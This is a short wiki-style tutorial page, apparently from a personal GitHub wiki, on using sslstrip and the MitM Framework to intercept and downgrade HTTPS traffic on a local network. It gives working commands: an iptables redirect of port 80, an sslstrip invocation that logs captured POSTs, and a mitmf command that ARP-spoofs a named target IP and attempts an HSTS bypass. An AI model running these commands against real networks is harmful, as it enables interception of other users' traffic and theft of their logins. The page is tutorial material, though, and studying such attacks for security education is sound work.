sslstrip

Jennings Zhang edited this page Dec 8, 2017 · 5 revisions

https://tools.kali.org/information-gathering/sslstrip

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links into look-alike HTTP links or homograph-similar HTTPS links.

sslstrip can fail against HSTS.

1. Modify iptables.

iptables is used to configure the Linux firewall.

Set an inbound rule to forward TCP segments from port 80 (HTTP) to another port (one which sslstrip will listen on).

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

2. Establish a MitM.

https://github.com/jennydaman/twlinux/wiki/Man-in-the-Middle-(MitM)-Attack-%E2%80%93-ARP-Poisoning

3. Exploit using sslstrip.

sslstrip -w sslstrip.log -l 10000

POSTs over SSL/TLS will be written to sslstrip.log.

MitM Framework

We're on the forefront of the cyber-security arms-race.

sslstrip+ (sslstrip2) attempts to overcome HSTS. It is ineffective against updated browsers and systems.

mitmf -i eth0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k --hsts

Based on

https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/